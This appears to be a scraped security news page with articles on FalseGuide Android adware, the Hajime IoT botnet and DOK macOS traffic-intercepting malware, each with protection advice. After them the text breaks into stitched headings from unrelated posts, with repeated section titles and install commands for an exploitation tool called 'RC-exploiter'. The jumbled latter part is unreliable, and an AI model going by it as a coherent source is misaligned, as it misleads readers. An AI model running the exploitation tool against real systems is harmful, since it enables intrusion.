Yes, about 2 Million Android users have fallen victim to malware hidden in over 40 fake companion guide apps for popular mobile games, such as Pokémon Go and FIFA Mobile, on the official Google Play Store, according to security researchers from Check Point.

Dubbed FalseGuide by the Check Point researchers, the malware creates a "silent botnet out of the infected devices" to deliver fraudulent mobile adware and generate ad revenue for cybercriminals.

Nearly 2 Million Android Users Infected!

While initially it was believed that the oldest instance of FalseGuide was uploaded to the Google Play in February and made its way onto over 600,000 devices within two months, further in-depth analysis by researchers revealed more infected apps which date back to November 2016.

"Since April 24, when the article below was first published, Check Point researchers learned that the FalseGuide attack is far more extensive than originally understood," Check Point researchers wrote in a blog post.

"The apps were uploaded to the app store [Google Play Store] as early as November 2016, meaning they hid successfully for five months, accumulating an astounding number of downloads."

Russian connection with FalseGuide

Check Point researchers discovered five additional apps containing the FalseGuide malware on Google Play Store, developed by "Anatoly Khmelenko" (translated from Russian Анатолий Хмеленко).

Also, the first batch of malicious apps was submitted under the Russian names of two fake developers, Sergei Vernik and Nikolai Zalupkin, which suggests the malware is of Russian origin.

FalseGuide attempts to turn infected devices into a botnet that could allow its operator to control the devices without the knowledge of the device owners.

Here's How FalseGuide Works:

While downloading to the victim's phone, FalseGuide requests administrative permissions to the device in an attempt to avoid being deleted by the user.

The malware then registers itself with Firebase Cloud Messaging – a cross-platform messaging service that allows app developers to send messages and notifications.

Once subscribed to this service, FalseGuide can allow the attackers to send messages containing links to additional malware and install them to the infected device, enabling attackers to display illegitimate pop-up ads out of context and generate revenue.

Depending on their objectives, the attackers could also inject highly malicious code into an infected device to root it, conduct a Distributed Denial of Service (DDoS) attack, or even penetrate private networks.

Google Removed the Malware hidden Apps, but are you Clean?

Check Point has provided a full list of malicious apps hiding FalseGuide, which posed as guides for FIFA Mobile, Criminal Case, Super Mario, Subway Surfers, Pokemon Go, Lego Nexo Knights, Lego City My City, Ninjago Tournament, Rolling Sky, Amaz3ing Spider-Man, Drift Zone 2, Dream League Soccer, and many more.

Check Point researchers notified Google about FalseGuide in February, after which the company silently removed the malware apps from the Play Store.

But despite being removed, the malicious apps are likely still active on a number of devices, leaving Android users open to cyber attacks.

"Mobile botnets are a growing trend since early last year, growing in both sophistication and reach," CheckPoint said. "This type of malware manages to infiltrate Google Play due to the non-malicious nature of the first component, which only downloads the actual harmful code."

How to Protect yourself against such Malware

There are standard protection measures you need to follow to remain unaffected:

Always download apps which are from trusted and verified developers and stick to trusted sources, like Google play Store and the Apple App Store.
Always verify app permissions before installing apps. If any app is asking more than what it is meant for, just do not install it.
Keep a good antivirus app on your device that can detect and block such malware before it can infect your device. Always keep the app up-to-date.
Do not download apps from third party source. Although in this case, the app is being distributed through the official Play Store, most often such malware are distributed via untrusted third-party app stores.
Avoid unknown and unsecured Wi-Fi hotspots and Keep your Wi-Fi turned OFF when not in use.
Be careful which apps you give administrative rights to. Admin rights are powerful and can give an app full control of your device.
Never click on links in SMS or MMS sent to your mobile phone. Even if the email looks legit, go directly to the website of origin and verify any possible updates.

written by Mohit Kumar

Hajime ‘Vigilante Botnet’ Growing Rapidly; Hijacks 300,000 IoT Devices Worldwide

Last week, we reported about a so-called 'vigilante hacker' who hacked into at least 10,000 vulnerable 'Internet of Things' devices, such as home routers and Internet-connected cameras, using a botnet malware in order to supposedly secure them.

Now, that vigilante hacker has already trapped roughly 300,000 devices in an IoT botnet known as Hajime, according to a new report published Tuesday by Kaspersky Lab, and this number will rise with each day that passes by.

The IoT botnet malware was emerged in October 2016, around the same time when the infamous Mirai botnet threatened the Internet last year with record-setting distributed denial-of-service (DDoS) attacks against the popular DNS provider Dyn.

How the Hajime IoT Botnet Works

Hajime botnet works much like Mirai by spreading itself via unsecured IoT devices that have open Telnet ports and uses default passwords and also uses the same list of username and password combinations that Mirai is programmed to use.

However, the interesting part of Hajime botnet is that, unlike Mirai, once Hajime infects an IoT devices, it secures the devices by blocking access to four ports (23, 7547, 5555, and 5358) known to be the most widely used vectors for infecting IoT devices, making Mirai or other threats out of their bay.

Hajime also uses a decentralized peer-to-peer network (instead of command-and-control server) to issue updates to infected devices, making it more difficult for ISPs and Internet providers to take down the botnet.

One of the most interesting things about Hajime is the botnet also displays a cryptographically signed message every 10 minutes or so on infected device terminals, describing its creators as "just a white hat, securing some systems."

Unlike Mirai and other IoT botnets, Hajime lacks DDoS capabilities and other hacking skills except for the propagation code that lets one infected IoT device search for other vulnerable devices and infects them.

But What if…?

What's not known is: What the Hajime Botnet is for? or Who is behind it?

"The most intriguing thing about Hajime is its purpose," says Kaspersky security researchers. "While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven’t seen it being used in any type of attack or malicious activity, adding that "its real purpose remains unknown."

Also, the researchers believe that this might not happen, because Hajime botnet takes steps to hide its running processes and files on the file system, making the detection of infected systems more difficult.

So far, the purpose behind building this botnet is not entirely clear, but all signs yet point to a possible white-hat hacker, who is on his/her mission to secure open and vulnerable systems over the Internet.

However, the most concerning issue of all — Is there any guarantee that the Hajime author will not add attack capabilities to the worm to use the hijacked devices for malicious purposes?

Maybe today the Hajime author is in the mission to secure the world, but tomorrow, when he would realize he could make money online by renting his/her botnet to others, he could be another Adam Mudd.

Mudd, a 19-year-old teenager, has recently been sentenced to 2 years in prison for creating and running a DDoS-for-hire service called 'Titanium Stresser' that made more than 1.7 million victims of DDoS attacks since 2013.

Secondly, What if the well-intentioned botnet is hijacked by some malicious actor?

If this happens, the vigilant IoT botnet could be used for malicious purposes, such as conducting DDoS attacks against online sites and services, spreading malware, or instantly bricking the infected devices at one click.

Radware researchers also believe that the flexible and extensible nature of the Hajime botnet can be used for malicious purposes, like those mentioned above and conducting real-time mass surveillance from Internet-connected webcams, according to a new threat advisory published Wednesday by Radware.

Last but not the least: Do we seriously need some vigilante hackers to protect our devices and network?

This solution could be temporary, trust me. For example, the latest Hajime botnet is nothing but a band-aid.

Since Hajime has no persistence mechanism, as soon as the infected device is rebooted, it goes back to its previously unsecured state, with default passwords and the Telnet port open to the world.

How to Protect your IoT devices?

The only true solution is You — Instead of just sitting over there, doing nothing and waiting for some vigilante hackers to do miracles, you can protect your IoT devices in a way Hajime or any well-intentioned botnet can't do.

So go and update the firmware of your devices, change their default passwords, put them behind a firewall, and if any device is by default vulnerable and cannot be updated, throw it and buy a new one.

Just keep in mind: Once a single IoT of yours gets compromised, your whole network falls under risk of getting compromised and so all your devices which are connected to that network.

Many people believe that they are much less likely to be bothered by malware if they use a Mac computer, but is it really true? Unfortunately, No.

According to the McAfee Labs, malware attacks on Apple's Mac computers were up 744% in 2016, and its researchers have discovered nearly 460,000 Mac malware samples, which is still just a small part of overall Mac malware out in the wild.

Today, Malware Research team at CheckPoint have discovered a new piece of fully-undetectable Mac malware, which according to them, affects all versions of Mac OS X, has zero detections on VirusTotal and is "signed with a valid developer certificate (authenticated by Apple)."

Dubbed DOK, the malware is being distributed via a coordinated email phishing campaign and, according to the researchers, is the first major scale malware to target macOS users.

The malware has been designed to gain administrative privileges and install a new root certificate on the target system, which allows attackers to intercept and gain complete access to all victim communication, including SSL encrypted traffic.

Just almost three months ago, Malwarebytes researchers also discovered a rare piece of Mac-based espionage malware, dubbed Fruitfly, that was used to spy on biomedical research center computers and remained undetected for years.

Here's How the DOK Malware Works:

The malware is distributed via a phishing email masquerading as a message regarding supposed inconsistencies in their tax returns, tricking the victims into running an attached malicious .zip file, which contains the malware.

Since the malware author is using a valid developer certificate signed by Apple, the malware easily bypasses Gatekeeper -- an inbuilt security feature of the macOS operating system by Apple. Interestingly, the DOK malware is also undetectable in almost all antivirus products.

Once installed, the malware copies itself to the /Users/Shared/ folder and then add to "loginItem" in order to make itself persistent, allowing it to execute automatically every time the system reboots, until it finishes to install its payload.

The malware then creates a window on top of all other windows, displaying a message claiming that a security issue has been identified in the operating system and an update is available, for which the user has to enter his/her password.

Once the victim installed the update, the malware gains administrator privileges on the victim's machine and changes the victim system's network settings, allowing all outgoing connections to pass through a proxy.

According to CheckPoint researchers, "using those privileges, the malware will then install brew, a package manager for OS X, which will be used to install additional tools – TOR and SOCAT."

DOK Deletes itself after Setting up Attacker's Proxy

The malware then installs a new root certificate in the infected Mac, which allows the attacker to intercept the victim’s traffic using a man-in-the-middle (MiTM) attack.

"As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings," the researchers say.

"The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim's traffic and tamper with it in any way they please."

According to researchers, almost no antivirus has updated its signature database to detect the DOK OS X malware, as the malware deletes itself once it modifies proxy settings on the target machines for interceptions.

Apple can resolve this issue just by revoking the developer certificate being abused by the malware author.

Meanwhile, users are always recommended to avoid clicking links contained in messages or emails from untrusted sources and always pay extra attention before proving your root password.

Installation

Tools used:

Install Requirements:

Finding GSM Frequencies:

1. Receive broadcast radio

2. Amateur radio

3. Radio astronomy

4. Track ships via AIS transmissions

5. Track aircraft via Mode S transmissions

6. Set up a DRM transmitter

7. Build a GSM network

8. Experiment with LTE

9. Learn how Global Navigation Satellite Systems work

10. Invent the wireless future!

Features

Screenshots

On Windows

On Linux (Backbox)

Help menu

Examples

Prerequisites

Needed dependencies for linux

Installation

Tested on:

DISCLAIMER:

Features:

Note:

DOWNLOAD & INSTALL1º - Download framework from github tar.gz OR zip OR git clone2º - Set files execution permitions cd RC-exploiter sudo chmod -R +x *.sh4º - Run main tool nano settings sudo ./rc-exploiter.sh

What is CVE-2017-0199?

Exploit

DEMO

Note

Reference

"For Educational Purposes Only"

What Happened?

What type of Information?

Who are not affected?

To Worry or Not to Worry?

How Many victims?

What is HipChat doing?

What Should You Do Now?

Support for RTL8812AU Wireless Card Injection

Streamlined Support for CUDA GPU Cracking

Amazon AWS and Micsosoft Azure Availability (GPU Support)

OpenVAS 9 Packaged in Kali Repositories

Nearly 2 Million Android Users Infected!

Russian connection with FalseGuide

Here's How FalseGuide Works:

Google Removed the Malware hidden Apps, but are you Clean?

How to Protect yourself against such Malware

How the Hajime IoT Botnet Works

But What if…?

However, the most concerning issue of all — Is there any guarantee that the Hajime author will not add attack capabilities to the worm to use the hijacked devices for malicious purposes?

Secondly, What if the well-intentioned botnet is hijacked by some malicious actor?

Last but not the least: Do we seriously need some vigilante hackers to protect our devices and network?

How to Protect your IoT devices?

Here's How the DOK Malware Works:

DOK Deletes itself after Setting up Attacker's Proxy

DOWNLOAD & INSTALL
`1º - Download framework from github tar.gz OR zip OR git clone 2º - Set files execution permitions cd RC-exploiter sudo chmod -R +x *.sh 4º - Run main tool nano settings sudo ./rc-exploiter.sh`